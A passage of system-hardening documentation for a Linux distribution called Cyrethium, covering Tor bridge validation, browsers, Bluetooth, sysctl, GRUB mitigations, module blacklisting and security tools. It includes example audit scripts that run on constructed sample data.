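    """Split pasted lines into accepted bridges and (line, reason) rejections."""
    accepted, rejected = [], []
    for line in lines:
        if not line.strip():
            continue                      # blank lines from the paste are harmless
        try:
            accepted.append(parse_obfs4_bridge(line))
        except BridgeError as exc:
            rejected.append((line, str(exc)))
    return accepted, rejected


def torrc_lines(bridges):
    """Render torrc lines for the accepted bridges (UseBridges, transport, Bridge entries)."""
    out = ["UseBridges 1", f"ClientTransportPlugin obfs4 exec {OBFS4PROXY}"]
    for b in bridges:
        out.append(f"Bridge obfs4 {b['ip']}:{b['port']} {b['fingerprint']} "
                   f"cert={b['cert']} iat-mode={b['iat_mode']}")
    return out


# Constructed sample paste: one good line (with stray spaces), one IPv6, one wrong transport.
DUMMY_FP = "0123456789ABCDEF0123456789ABCDEF01234567"
DUMMY_CERT = "A" * 70
SAMPLE_PASTE = [
    f"  obfs4 192.0.2.10:443 {DUMMY_FP} cert={DUMMY_CERT} iat-mode=0  ",
    f"obfs4 [2001:db8::1]:443 {DUMMY_FP} cert={DUMMY_CERT} iat-mode=0",
    f"snowflake 198.51.100.5:80 {DUMMY_FP}",
]

if __name__ == "__main__":
    good, bad = check_lines(SAMPLE_PASTE)
    print("\n".join(torrc_lines(good)))
    for line, why in bad:
        print(f"rejected: {why}: {line.strip()}")
```

Run it on the lines you intend to paste; anything it rejects would either be ignored by Tor or leave you without a working bridge after the restart.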

Browsing the Internet

Cyrethium has two browsers for browsing the internet: Hardened Firefox and Amnesic Firefox.

Hardened Firefox: More user-friendly and compatible. Remembers your sessions and is recommended as a daily browser.

Amnesic Firefox: Has strict security settings. Less user-friendly but more secure.

Initial Setup and Addon Usage

On first launch, update addons if they are not current.

Installing additional addons can make you more detectable; uBlock and NoScript are sufficient for security.

For more technical details, review the Browsers documentation.

Developer Notes

You cannot use Vanilla Firefox in Cyrethium. Browsers are profile-based and customized; tampering too much with Firefox can cause Cyrethium browsers to break.

Hardened and Amnesic Firefox browsers are fully equipped in terms of security.

Amnesic Firefox contains even stricter settings than Tor Browser in some aspects.

It is normal to experience problems on some sites; you may need to compromise on usability for security.

JavaScript attacks are very dangerous — don't loosen NoScript.

Why Firefox?

Tor Browser runs its own Tor instance and routes packets to the Tor network with its own configuration.

However, in Cyrethium, all traffic is already forced through Tor via iptables. If Tor Browser tries to start its own Tor service, there will be a conflict and it cannot start.

If traffic is already routed to Tor, Tor Browser is not needed and works incompatibly with the system.

Therefore, in privacy-focused systems like Cyrethium, using Tor Browser may be unnecessary and incompatible.

Security Comparison

Amnesic and Hardened Firefox take many security settings from Tor Browser.

In terms of security, there is no big difference between them.

Bluetooth Settings & Hardening

Bluetooth usage in Cyrethium is configured to be both user-friendly and secure. This section explains how users can use Bluetooth and how to adjust the system's Bluetooth hardening settings.

1. Using Bluetooth

To use Bluetooth in Cyrethium:

Install Required Packages

Ensure you have the main Bluetooth stack and utilities installed:

sudo apt install bluez blueman

  • bluez → the main Bluetooth protocol stack for Linux.
  • blueman → a graphical manager for pairing and managing devices.

Access Bluetooth Settings

Open Applications → Settings → Bluetooth or launch Blueman Manager from the Applications menu.

From here, you can:

  • Turn Bluetooth on/off
  • Pair with devices
  • Remove paired devices
  • Set device discoverability

2. Bluetooth Hardening

Cyrethium includes security-focused defaults for Bluetooth. The main configuration file is:

/etc/bluetooth/30_security_misc.conf

A sample default configuration:

[General]
PairableTimeout = 30         # Bluetooth stays pairable for 30 seconds
DiscoverableTimeout = 30     # Bluetooth stays discoverable for 30 seconds
MaxControllers=1             # Only one controller exposed
TemporaryTimeout = 0         # Temporary devices are kept indefinitely

[Policy]
AutoEnable=false             # Adapters do NOT automatically enable themselves
Privacy=network/on           # Enforce use of private addresses (RPA) for security

What these settings do:

  • PairableTimeout: Limits the time the device can accept pairing requests. Lowering this reduces exposure.
  • DiscoverableTimeout: Limits visibility of the device. 30 seconds is a secure default.
  • MaxControllers: Limits how many Bluetooth adapters are active/exposed. One is sufficient for most users.
  • TemporaryTimeout: Determines how long temporary devices remain in the system. 0 = never delete automatically.
  • AutoEnable: Prevents adapters from automatically enabling themselves, reducing unwanted exposure.
  • Privacy: Forces the use of randomized private addresses, protecting against tracking and passive attacks.

3. Adjusting Bluetooth Hardening Settings

To adjust these settings:

Open the configuration file as root:

sudo nano /etc/bluetooth/30_security_misc.conf

Modify the values according to your security needs:

  • More secure → Reduce PairableTimeout/DiscoverableTimeout, set MaxControllers=1, keep AutoEnable=false.
  • More convenient → Increase timeouts, enable AutoEnable=true if you frequently use multiple devices.

Save the file and restart Bluetooth service:

sudo systemctl restart bluetooth

Tip: For maximum security, keep discoverability and pairability timers short and leave AutoEnable disabled.

Cyrethium's default Bluetooth configuration balances usability and hardening, making casual attacks and tracking significantly harder.
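An added check for this section (example code, not part of Cyrethium's tooling): it parses the fragment with the rules bluetoothd itself uses, GLib's key-file format, and compares it with the values listed above. That parser only treats lines that start with `#` as comments; a comment written after a value on the same line becomes part of the value, and bluetoothd then ignores the key and keeps its built-in default. The audit therefore also reports integer keys whose value is not a plain number. Both configuration texts below are constructed samples.

```python
"""Audit a bluez configuration fragment against hardened expectations.

Added example for this documentation; not part of Cyrethium's tooling.
The configuration texts below are constructed for the demonstration.
"""

# What a hardened fragment should contain, keyed by (section, key);
# the values are the ones documented above.
EXPECTED = {
    ("General", "PairableTimeout"): "30",
    ("General", "DiscoverableTimeout"): "30",
    ("General", "MaxControllers"): "1",
    ("General", "TemporaryTimeout"): "0",
    ("Policy", "AutoEnable"): "false",
    ("Policy", "Privacy"): "network/on",
}
INTEGER_KEYS = {"PairableTimeout", "DiscoverableTimeout", "MaxControllers", "TemporaryTimeout"}


def parse_keyfile(text):
    """Parse text the way GLib's GKeyFile does (the parser bluetoothd uses).

    Only lines that *start* with '#' are comments; everything after '=' up to
    the end of the line is the value, so a trailing comment becomes part of it.
    """
    data = {}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip()
            continue
        if "=" in line and section is not None:
            key, value = line.split("=", 1)
            data[(section, key.strip())] = value.strip()
    return data


def audit(text, expected=EXPECTED):
    """Return a list of findings; an empty list means the file matches."""
    data = parse_keyfile(text)
    findings = []
    for (section, key), want in expected.items():
        got = data.get((section, key))
        if got is None:
            findings.append(f"[{section}] {key} missing (bluez default applies)")
        elif key in INTEGER_KEYS and not got.lstrip("-").isdigit():
            findings.append(f"[{section}] {key}={got!r} is not a plain integer "
                            "(trailing comment?); bluez falls back to its default")
        elif got != want:
            findings.append(f"[{section}] {key}={got} (expected {want})")
    return findings


# Constructed hardened fragment: comments kept on their own lines.
HARDENED = """\
[General]
# pairable/discoverable window of 30 seconds
PairableTimeout = 30
DiscoverableTimeout = 30
MaxControllers=1
TemporaryTimeout = 0

[Policy]
AutoEnable=false
Privacy=network/on
"""

# Constructed weakened fragment: a trailing comment, a long window, auto-enable on.
WEAK = """\
[General]
PairableTimeout = 0   # never times out
DiscoverableTimeout = 300
MaxControllers=1
TemporaryTimeout = 0

[Policy]
AutoEnable=true
"""

if __name__ == "__main__":
    for name, text in (("hardened", HARDENED), ("weak", WEAK)):
        print(name, audit(text) or "OK")
```

To audit the real file, pass the contents of `/etc/bluetooth/30_security_misc.conf` to `audit()`; after editing, `sudo systemctl restart bluetooth` and check `journalctl -u bluetooth` for key-file warnings.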

System Security Architecture - Introduction

Cyrethium implements a comprehensive hardening process to minimize the system's attack surface and enhance its security. Through this process, the system becomes more resilient against various attacks and exploit attempts.

Hardening is applied system-wide through sysctl settings, modprobe.d module management, GRUB boot parameters, limits configurations, and other additional security measures. All these settings are applied on top of the Vanilla Debian kernel, and AppArmor security profiles are actively used in the system.

Some settings are forked from the Kicksecure distribution and customized according to Cyrethium's specific needs. This way, both stability is maintained and the security level is elevated. Cyrethium hardening settings aim to provide maximum security without negatively affecting user experience; they have minimal impact on performance and functionality in daily use.

In this documentation, the details, benefits, and effects on the system of Cyrethium's applied hardening settings are discussed in detail. The aim is to help users understand why the system is so secure and what threat each measure provides protection against.

Sysctl Hardening

Cyrethium uses sysctl to apply system hardening settings, reducing the attack surface. It also aims to improve system performance with optimization settings. Cyrethium's applied settings can be found in /etc/sysctl.d/sysctl.conf. The technical explanations and benefits of the settings are as follows:

Kernel Hardening Settings

Disable module loading after boot (kernel.modules_disabled): Prevents kernel modules from being loaded after boot. This prevents malicious modules from being added to the system. If activated, some hardware drivers or module-based tools like iptables may not work. Disabled by default.

Restrict kernel pointer access (kernel.kptr_restrict, kernel.dmesg_restrict): Hides kernel pointers and logs from non-root users. This prevents critical kernel information from leaking to those trying to develop exploits.

Enhanced ptrace restrictions (kernel.yama.ptrace_scope): Limits processes from being monitored by other processes. Prevents non-root users from debugging processes or performing injection.

Disable unprivileged BPF (kernel.unprivileged_bpf_disabled, net.core.bpf_jit_harden): Prevents non-root users from running BPF programs and hardens the JIT compiler with security focus. This provides protection against modern kernel exploits and microarchitectural attacks.

Kernel panic on oops (kernel.panic_on_oops, kernel.panic): Automatically puts the system into panic mode when a kernel error (oops) occurs and restarts within the specified time. This prevents uncertain situations and system corruption from attacks.

Disable kexec (kernel.kexec_load_disabled): Prevents kernel replacement and fast reboot (kexec) attacks. This reduces the risk of post-boot rootkit loading.

Memory Security Hardening

Address Space Layout Randomization (ASLR) (kernel.randomize_va_space): Randomizes memory addresses. This makes it difficult for exploits to use predictable memory structures and increases system security.

Core dump restrictions (fs.suid_dumpable, kernel.core_pattern): Prevents setuid programs from taking core dumps and redirects core dump files to /dev/null or similar. This prevents critical information (passwords, memory content) from leaking.

Memory overcommit (vm.overcommit_memory, vm.overcommit_ratio): Controls memory overcommit behavior. A value of 0 limits the kernel's overcommit based on physical and swap memory, reducing crash risk. An 80% overcommit ratio maintains system compatibility.

File Security Hardening

Protected links and fifos (fs.protected_hardlinks, fs.protected_symlinks, fs.protected_fifos, fs.protected_regular): Prevents users from damaging others' files and links. Provides access control especially to setuid or important files.

Inotify limits (fs.inotify.max_user_watches, fs.inotify.max_user_instances, fs.inotify.max_queued_events): Increases file monitoring limits. This prevents DoS attacks and excessive resource consumption.

Network Security Hardening

Enable SYN cookies (net.ipv4.tcp_syncookies): Reduces TCP SYN flood attacks. Prevents connection tables from filling when the server receives intense SYN packets.

ICMP security (net.ipv4.icmp_echo_ignore_broadcasts, net.ipv4.icmp_ignore_bogus_error_responses, net.ipv4.icmp_echo_ignore_all): Ignores broadcast pings and erroneous ICMP responses, reducing network visibility. Allows normal pings without blocking access tests.

Log suspicious packets (net.ipv4.conf.*.log_martians): Logs packets from invalid or suspicious IP addresses. This is useful for monitoring possible attacks on the network.

TCP/IP Performance Enhancement and Hardening

TCP SYN flood protection (net.ipv4.tcp_*):

  • tcp_max_syn_backlog: Size of the backlog queue that stores pending SYN connections. A high value tolerates SYN flood attacks.
  • tcp_syn_retries / tcp_synack_retries: Number of retries during connection establishment. Low value responds quickly to attacks.
  • tcp_abort_on_overflow: Rejects new connections when SYN backlog is full, provides protection against attacks.

TCP connection tuning:

  • tcp_fin_timeout: Connection closing time after FIN packets. Low value reduces resource consumption.
  • tcp_keepalive_*: Keepalive packet management for cleaning long-idle connections and protecting system resources.

TCP security features:

  • tcp_rfc1337: Prevents TCP TIME-WAIT attacks.
  • tcp_timestamps: Disables TCP timestamps, prevents some information leaks.
  • tcp_sack / tcp_fack: Provides safer and faster retransmission in packet losses.

TCP window scaling & buffers:

  • tcp_window_scaling: Provides efficient data flow in high-bandwidth connections.
  • rmem / wmem and tcp_rmem / tcp_wmem: Read/write buffer sizes for TCP and UDP, optimizes performance and data transmission capacity.

TCP congestion control:

  • default_qdisc = fq / tcp_congestion_control = bbr: BBR algorithm provides low latency and high bandwidth, improves network performance.

Connection tracking optimization (nf_conntrack_*):

Maximum connection count and timeouts ensure the system remains stable under high traffic.

UDP performance:

  • udp_rmem_min / udp_wmem_min: Minimum buffer sizes for UDP packets.
  • netdev_max_backlog: Network interface queue length, reduces packet loss and provides stability under heavy traffic.

IPv6 Hardening

Router Advertisements (accept_ra*): Disables accepting IPv6 router advertisements. This way, the network cannot automatically configure the system's routing, and the system is protected against fake router attacks (RA spoofing).

Autoconfiguration (autoconf): Turns off IPv6 automatic configuration. The system works with manual or static configuration without receiving automatic IP assignments, increasing security.

Duplicate Address Detection (dad_transmits): Disables the mechanism that checks IPv6 address conflicts. This provides additional risk management against potential attacks and in some cases reduces detection traffic on the network.

Rate Limiting & DoS Protection

ICMP Rate Limiting (icmp_ratelimit / icmp_ratemask): Limits the transmission rate of ICMP messages. This provides protection against ping flood and similar DoS (Denial of Service) attacks.

ARP Security (arp_ignore, arp_announce, arp_filter): Adds security layer for ARP requests and responses.

  • arp_ignore = 1: System only responds to ARP for the correct interface.
  • arp_announce = 2: System announces its own IP only through the appropriate interface.
  • arp_filter = 1: Ensures ARP queries are routed to the correct network interface.

These settings make ARP spoofing attacks more difficult.

Neighbor Table Limits (gc_thresh*): Determines IPv4 and IPv6 neighbor table limits.

  • gc_thresh1: minimum threshold
  • gc_thresh2: medium level
  • gc_thresh3: maximum table size

This controls the network device's memory usage and reduces crash risk during DoS attacks.

System Performance Optimization

Virtual Memory Tuning:

  • vm.dirty_ratio = 15: Starts disk writing when unwritten data accumulated in memory exceeds 15% of total memory.
  • vm.dirty_background_ratio = 5: Background writing threshold is set to 5%.
  • vm.dirty_expire_centisecs = 3000: Unwritten data in memory is marked for disk writing after 30 seconds.
  • vm.dirty_writeback_centisecs = 500: Disk writing operation is performed every 5 seconds.
  • vm.swappiness = 10: Minimizes swap usage; swap is not used until RAM is full.
  • vm.vfs_cache_pressure = 50: Provides standard balance for file system cache; no more aggressive cleaning than default.

Kernel Scheduler Optimization:

  • kernel.sched_migration_cost_ns = 5000000: Inter-processor task migration cost is set to 5ms; this reduces unnecessary processor migrations.
  • kernel.sched_autogroup_enabled = 0: Automatic group scheduling is disabled; process group priority is managed manually.

I/O Scheduler Optimization:

  • vm.page-cluster = 3: Sets block grouping number in disk read/write operations; smaller group provides lower latency and better response time.

Security Logging & Monitoring

Note: These settings are disabled by default. Can be enabled optionally.

  • kernel.printk = 4 4 1 7: Sets kernel log levels. This way critical and warning messages are written to system logs in detail.
  • kernel.printk_ratelimit = 5: Limits maximum number of log messages per second; prevents excessive message flooding.
  • kernel.printk_ratelimit_burst = 10: Provides short-term tolerance in sudden log increases; allows maximum 10 messages in sudden bursts.

Additional Hardening

Disable magic SysRq key:

  • kernel.sysrq = 0: SysRq key combinations are disabled. This prevents kernel manipulation with emergency keys.

Restrict access to kernel logs:

  • kernel.dmesg_restrict = 1: Only root user can see kernel logs. Normal users cannot read kernel information, thus preventing information leakage.

Harden shared memory:

  • kernel.shm_rmid_forced = 1: Users can delete unclosed shared memory segments. This prevents unnecessary occupation of resources and possible attacks.

Process limits:

  • kernel.pid_max = 4194304: Maximum process ID limit that can be created by the system is increased.
  • kernel.threads-max = 4194304: Maximum number of threads that can be opened system-wide is determined. This optimizes resource management under heavy load and provides protection against DoS attacks.
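Reading /etc/sysctl.d/sysctl.conf shows what was intended, not what the kernel is running: a later fragment, a service, or a manual `sysctl -w` can change any of these values after boot. The following added example (not Cyrethium's code) parses a sysctl.d-style fragment and compares each key with the live value under /proc/sys, expanding `*` patterns such as `net.ipv4.conf.*.log_martians` and normalizing multi-value entries like `kernel.printk`. The configuration excerpt and the "live" tree are constructed samples so the script runs offline; point `drift()` at the real `/proc/sys` (its default) to check a running system.

```python
"""Detect drift between a sysctl.d fragment and the running kernel.

Added example for this documentation; it is not part of Cyrethium.
drift() reads /proc/sys by default; the demonstration below runs it
against a constructed look-alike tree so it works anywhere (and offline).
"""
import glob
import os
import tempfile


def parse_sysctl_conf(text):
    """Parse 'key = value' lines; '#'/';' start comments, keys may use '.' or '/'."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;" or "=" not in line:
            continue
        key, value = line.split("=", 1)
        key = key.strip().lstrip("-")                 # leading '-' means "ignore errors"
        settings[key.replace("/", ".")] = value.split()  # normalize whitespace
    return settings


def key_to_path(key, root):
    return os.path.join(root, *key.split("."))


def expand(key, root):
    """Expand glob keys such as net.ipv4.conf.*.log_martians against root."""
    if "*" not in key:
        return [key]
    matches = sorted(glob.glob(key_to_path(key, root)))
    return [os.path.relpath(m, root).replace(os.sep, ".") for m in matches]


def read_live(key, root="/proc/sys"):
    """Return the live value as a list of tokens, or None if the key does not exist."""
    try:
        with open(key_to_path(key, root)) as fh:
            return fh.read().split()
    except OSError:
        return None


def drift(config_text, root="/proc/sys"):
    """Return [(key, configured, live)] for every key whose live value differs or is missing."""
    out = []
    for key, want in parse_sysctl_conf(config_text).items():
        concrete = expand(key, root)
        if not concrete:
            out.append((key, want, None))
        for k in concrete:
            got = read_live(k, root)
            if got != want:
                out.append((k, want, got))
    return out


def build_fake_procsys(values):
    """Write a constructed /proc/sys look-alike for the demonstration; returns its root."""
    root = tempfile.mkdtemp(prefix="fake-procsys-")
    for key, value in values.items():
        path = key_to_path(key, root)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(value + "\n")
    return root


# Constructed fragment with a few of the settings this section describes.
SAMPLE_CONF = """\
# hardening excerpt (constructed sample)
kernel.kptr_restrict = 2
kernel.dmesg_restrict = 1
kernel.yama.ptrace_scope = 2
net.ipv4.tcp_syncookies = 1
net.ipv4.conf.*.log_martians = 1
kernel.printk = 4 4 1 7
"""

# Constructed live state: ptrace_scope was lowered and one interface lost log_martians.
SAMPLE_LIVE = {
    "kernel.kptr_restrict": "2",
    "kernel.dmesg_restrict": "1",
    "kernel.yama.ptrace_scope": "1",
    "net.ipv4.tcp_syncookies": "1",
    "net.ipv4.conf.all.log_martians": "1",
    "net.ipv4.conf.default.log_martians": "1",
    "net.ipv4.conf.eth0.log_martians": "0",
    "kernel.printk": "4\t4\t1\t7",
}

if __name__ == "__main__":
    root = build_fake_procsys(SAMPLE_LIVE)
    for key, want, got in drift(SAMPLE_CONF, root):
        print(f"{key}: configured {' '.join(want)}, live {got and ' '.join(got)}")
```

On a real system, `drift(open("/etc/sysctl.d/sysctl.conf").read())` lists exactly the keys whose runtime value no longer matches the file; the glob expansion matters because an interface added after boot only picks up the `default` value, not one written to `all`.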

GRUB Hardening

Cyrethium applies various CPU mitigation and hardening settings to reduce attack surface. These settings are forked from the Kicksecure distribution and can be found under /etc/default/grub.d/.

CPU Security and Mitigations (40_cpu_mitigations.cfg)

1. mitigations=auto: Kernel enables appropriate automatic security patches for the current CPU and microarchitecture. Provides basic protection against attacks; performance loss is minimal.

2. nosmt=force: Simultaneous Multithreading (SMT/HyperThreading) is completely disabled. Performance decreases in multi-threaded tasks, but prevents some CPU side-channel attacks.

3. spectre_v2=on: Provides protection against Branch Target Injection (Spectre Variant 2) attacks.

4. spectre_bhi=on: Provides protection against Intel Branch History Injection attacks. Applied on both AMD and Intel CPUs.

5. spec_store_bypass_disable=on: Blocks Speculative Store Bypass (Spectre Variant 4) attacks.

6. ssbd=force-on: Speculative Store Bypass Disable (SSBD) is forcibly enabled. Effective in kernel and user space.

7. l1tf=full,force: Provides full protection for L1 Terminal Fault vulnerability. Works with L1D cache flush and SMT disable operations.

8. kvm-intel.vmentry_l1d_flush=always: Ensures L1D cache is cleaned at entries in KVM virtual machines.

9. mds=full,nosmt: Prevents Microarchitectural Data Sampling attacks. Includes CPU cache cleaning and SMT disable.

10. tsx=off: TSX is disabled to prevent TSX Asynchronous Abort (TAA) vulnerability.

11. tsx_async_abort=full,nosmt: TSX-related memory leaks are completely blocked, SMT is turned off.

12. kvm.nx_huge_pages=force: Prevents large pages from being used as executable against iTLB Multihit vulnerability.

13. l1d_flush=on: Cache flush is performed via prctl() to prevent L1D cache leaks.

14. mmio_stale_data=full,nosmt: Prevents Processor MMIO Stale Data vulnerability; CPU buffer is cleaned and SMT is disabled.

15. retbleed=auto,nosmt: CPU-dependent mitigations are enabled against Retbleed attack and SMT is turned off.

16. kvm.mitigate_smt_rsb=1: Prevents Cross-Thread Return Stack Buffer attacks (AMD Zen 1-2).

17. spec_rstack_overflow=safe-ret (optional, commented): Provides controlled RET instructions for Speculative Return Stack Overflow vulnerability. Provides stronger security but may affect performance.

18. gather_data_sampling=force: Blocks Gather Data Sampling vulnerability. If there is no microcode, AVX instruction set is completely disabled.

19. reg_file_data_sampling=on: Prevents Register File Data Sampling vulnerability. Applied especially on Intel Atom and some hybrid CPUs.

Kernel Hardening (40_kernel_hardening.cfg)

1. Kernel Space (Memory and Kernel Protection):

  • slab_nomerge: Prevents merging of similar-sized slabs, reduces heap overflow risk.
  • slab_debug=FZ (commented): Slab debug mode, catches memory leaks but significantly reduces performance.
  • init_on_alloc=1: Zeros newly allocated memory pages, prevents use-after-free attacks.
  • init_on_free=1: Zeros freed memory pages, prevents use-after-free attacks.
  • page_alloc.shuffle=1: Shuffles kernel page allocator, makes ROP and information leak attacks difficult.
  • pti=on: Kernel Page Table Isolation (Meltdown mitigation).
  • randomize_kstack_offset=on: Randomizes syscall stack offset, makes memory leaks difficult.
  • vsyscall=none: Disables fixed-address vsyscalls, reduces ROP attack surface.
  • kfence.sample_interval=100: Scans heap out-of-bounds and use-after-free errors with KFENCE at 100ms intervals.
  • vdso32=0: 32-bit vDSO mapping is disabled, old glibc compatibility.
  • efi_pstore.pstore_disable=1: EFI persistent storage disabled, kernel crash logs are not written to disk.

2. Direct Memory Access (DMA / IOMMU):

  • amd_iommu=on: IOMMU active on AMD systems, prevents DMA attacks.
  • intel_iommu=on: IOMMU active on Intel systems, prevents DMA attacks.
  • iommu=force: IOMMU usage is mandatory, DMA accesses under strict control.
  • iommu.passthrough=0: DMA passthrough disabled, devices cannot access memory directly.
  • iommu.strict=1: DMA accesses are bound to strict rules, compatibility with older devices is ensured.
  • efi=disable_early_pci_dma: Cleans old PCI DMAs during boot, reduces DMA attack risk.

3. Entropy / RNG:

  • random.trust_bootloader=off: Don't trust bootloader's RNG seed, use additional entropy.
  • random.trust_cpu=off: Don't trust CPU's RDRAND/RNG seed, use additional entropy.
  • extra_latent_entropy: Collects extra entropy from memory during boot, strengthens RNG.

Recovery and Dracut Hardening

  • GRUB_DISABLE_RECOVERY="true": Disables GRUB's recovery menu. User cannot accidentally enter recovery mode.
  • rd.emergency=halt: Prevents Dracut emergency shell from opening, system halts in critical error situations.
  • rd.shell=0: Completely disables Dracut initramfs shell.
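Whether these parameters were actually honoured is visible in two places: /proc/cmdline (what the kernel was booted with) and /sys/devices/system/cpu/vulnerabilities (the kernel's own report of which mitigations are active). The following added example, not part of Cyrethium, parses a kernel command line and reports parameters from the lists above that are missing or set to a different value, and summarizes the vulnerabilities directory. The command lines are constructed samples; the expected values are the ones given in this section.

```python
"""Check that GRUB hardening parameters reached the running kernel.

Added example for this documentation, not part of Cyrethium. It parses
the kernel command line (/proc/cmdline by default) and summarizes
/sys/devices/system/cpu/vulnerabilities; constructed sample data is
used for the demonstration.
"""
import os
import shlex

# A subset of the parameters listed above, with the value each should carry
# (None means a bare flag with no value).
EXPECTED_PARAMS = {
    "mitigations": "auto", "nosmt": "force", "spectre_v2": "on", "spectre_bhi": "on",
    "spec_store_bypass_disable": "on", "ssbd": "force-on", "l1tf": "full,force",
    "mds": "full,nosmt", "tsx": "off", "tsx_async_abort": "full,nosmt",
    "pti": "on", "vsyscall": "none", "init_on_alloc": "1", "init_on_free": "1",
    "slab_nomerge": None, "iommu": "force", "random.trust_cpu": "off",
}


def parse_cmdline(text):
    """Split a kernel command line into {param: value}; bare flags map to None."""
    params = {}
    for token in shlex.split(text):       # honours quoted values like root="UUID=..."
        name, sep, value = token.partition("=")
        params[name] = value if sep else None
    return params


def missing_params(cmdline_text, expected=EXPECTED_PARAMS):
    """Return {param: (expected, actual)} for entries absent or set differently."""
    actual = parse_cmdline(cmdline_text)
    bad = {}
    for name, want in expected.items():
        if name not in actual:
            bad[name] = (want, None)        # not on the command line at all
        elif want is not None and actual[name] != want:
            bad[name] = (want, actual[name])
    return bad


def vulnerability_status(sysfs_dir="/sys/devices/system/cpu/vulnerabilities"):
    """Map each vulnerability file to its status line as reported by the kernel."""
    status = {}
    try:
        names = sorted(os.listdir(sysfs_dir))
    except OSError:
        return status                       # not Linux, or sysfs unavailable
    for name in names:
        with open(os.path.join(sysfs_dir, name)) as fh:
            status[name] = fh.read().strip()
    return status


def unmitigated(status):
    """Names whose status starts with 'Vulnerable' (no effective mitigation)."""
    return sorted(n for n, s in status.items() if s.startswith("Vulnerable"))


# Constructed sample command line carrying the expected parameters.
SAMPLE_CMDLINE = ('BOOT_IMAGE=/vmlinuz root=UUID=0000-constructed ro quiet '
                  'mitigations=auto nosmt=force spectre_v2=on spectre_bhi=on '
                  'spec_store_bypass_disable=on ssbd=force-on l1tf=full,force '
                  'mds=full,nosmt tsx=off tsx_async_abort=full,nosmt pti=on '
                  'vsyscall=none init_on_alloc=1 init_on_free=1 slab_nomerge '
                  'iommu=force random.trust_cpu=off')
# Constructed weakened line: mitigations switched off and nosmt removed.
SAMPLE_WEAK = (SAMPLE_CMDLINE.replace("mitigations=auto", "mitigations=off")
               .replace(" nosmt=force", ""))

if __name__ == "__main__":
    with open("/proc/cmdline") as fh:
        live = fh.read()
    print("missing or changed:", missing_params(live) or "none")
    print("still vulnerable:", unmitigated(vulnerability_status()) or "none")
```

A parameter can be present on the command line and still leave a `Vulnerable` entry, for example when the CPU lacks the microcode the mitigation needs, which is why both views are worth checking after every kernel or GRUB change.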

System Limits

Cyrethium applies limits settings for stability and security. Settings can be found under /etc/security/limits.d/hardened.conf. The explanations are as follows:

* hard core 0: Disables core dumps. When a program crashes, data in memory (passwords, API keys, etc.) is not exposed. This reduces data leak risk to attackers.

* hard nproc 2048 / * soft nproc 1024: Limits the number of processes a user can open. A user or malicious software cannot open unlimited processes. This prevents DoS attacks like fork bombs and prevents system crashes.

* hard nofile 65535 / * soft nofile 16384: Limits the number of files that can be opened. A user or service cannot consume all system file descriptors. This provides protection against DoS attacks and stability.

* hard stack 8192: Limits each user's stack size. Stack overflow attacks or faulty software do not affect the entire system, reducing crash possibility.

* hard memlock 65536: Limits the amount of locked memory. Users or services cannot completely reserve system memory, reducing Out-of-Memory (OOM) situations.

Module Blacklisting (Modprobe.d)

Cyrethium aims to reduce the attack surface by blocking some risky modules. Settings are found under /etc/modprobe.d/. Explanations and benefits are below:

Disabled Modules Categories

FireWire Modules: All related modules are disabled to prevent DMA-based memory attacks that can be performed over FireWire.

GPS Modules: Hardware-based GPS receivers and GNSS modules are disabled to prevent location information leakage.

Thunderbolt Modules: Thunderbolt and related network modules are closed to prevent high-speed DMA attacks through physical access.

Old File Systems: File system drivers not used by the system or rarely used are disabled to reduce kernel attack surface.

Network File Systems: NFS, CIFS, SMB and similar network file systems are closed to reduce unauthorized remote file access risks.

Legacy Network Protocols: Network protocols that are not in modern use, have weak security, or are unnecessary are disabled.

Framebuffer Drivers: Unused graphics card and framebuffer drivers are disabled to prevent possible hardware-based attacks and unnecessary kernel loads.

USBGuard

Cyrethium offers a tool called USBGuard Manager to facilitate USBGuard management.

What is USBGuard and what does it do?

USBGuard is a security tool that controls the connection of USB devices to the system. The user can define which USB devices are authorized and prevent unauthorized devices from connecting. This prevents malicious USB hardware from loading malware into the system or accessing sensitive data. This approach provides extra protection against physical attacks and significantly increases data security.

RkHunter

Cyrethium comes pre-configured with rkhunter and includes a special tool to facilitate its use.

Rkhunter and Chkrootkit scans can be performed from the SystemKnight tool.

What is RK Hunter and what does it do?

RKHunter (Rootkit Hunter) is a security tool designed to detect rootkits, backdoors, trojans, and other malicious software on Linux and Unix-based systems. It checks the integrity of critical files in the system, scans for known rootkit signatures, and audits suspicious file permissions. It also reports hidden files and directories, unusual authorizations, and potential malicious changes. RKHunter regularly scans the system's security status and sends alerts to administrators, enabling early detection of possible attacks. Its main purpose is to verify the cleanliness and integrity of the system and prevent malicious software from having permanent effects on the system.

ClamAV

Cyrethium comes pre-configured with ClamAV and includes a special tool to facilitate its use.

ClamAV scans can be performed with the SystemKnight tool.

What is ClamAV and what does it do?

ClamAV is an open-source antivirus software used on Linux and Unix-based systems. It is designed to detect and clean malicious software, viruses, trojans, worms, and other harmful files on the system. ClamAV offers features such as file scanning, email scanning, and real-time protection; it also stays constantly updated against new threats through updated signature databases. Users can use ClamAV to detect malicious software on network and file servers at an early stage, prevent infections, and increase system security. Its main purpose is to protect system integrity and prevent malicious software from damaging the system.

Firejail

Cyrethium offers a tool called Cyrethium Jails to facilitate Firejail management.

Firejail is a powerful security tool used to run applications in isolation on Linux systems and plays a critical role especially in protecting user data and system resources. Firejail runs applications in isolated environments called "sandboxes"; this environment prevents the application from directly accessing the system's core area, critical files and directories, or other applications. Thus, malicious code execution, buffer overflow, remote code execution (RCE), zero-day exploits, and privilege escalation attacks that can occur through a browser or media player cannot directly damage system resources.

Firejail's protection is layered. First, it isolates process IDs, networking, users, and mounts using Linux namespaces. This way, the application runs in its own virtual environment and cannot touch the rest of the system. Through Seccomp filters, the application is allowed to use only safe syscalls; potentially harmful or exploitation-intended calls are blocked. Additionally, the application's capabilities are restricted with capabilities and resource limits; for example, an application is prevented from starting processes with root privileges or consuming system resources excessively.

Cyrethium provides full support for Firejail and facilitates its use with the Cyrethium Jails tool.

Other Security Settings

Cyrethium increases system security with other small but effective settings. Other settings made and their effects are as follows:

1. Kernel Map Deletion

Cyrethium's deletion of the kernel map (kernel symbol map or kallsyms) at startup is a measure taken to increase system security. Normally, the Linux kernel presents the addresses of all kernel symbols (function names, variables, etc.) to user space through /proc/kallsyms or similar paths. This information can serve as a critical guide for attackers; for example, an attacker can use these addresses to target specific functions in the kernel or develop kernel exploits.

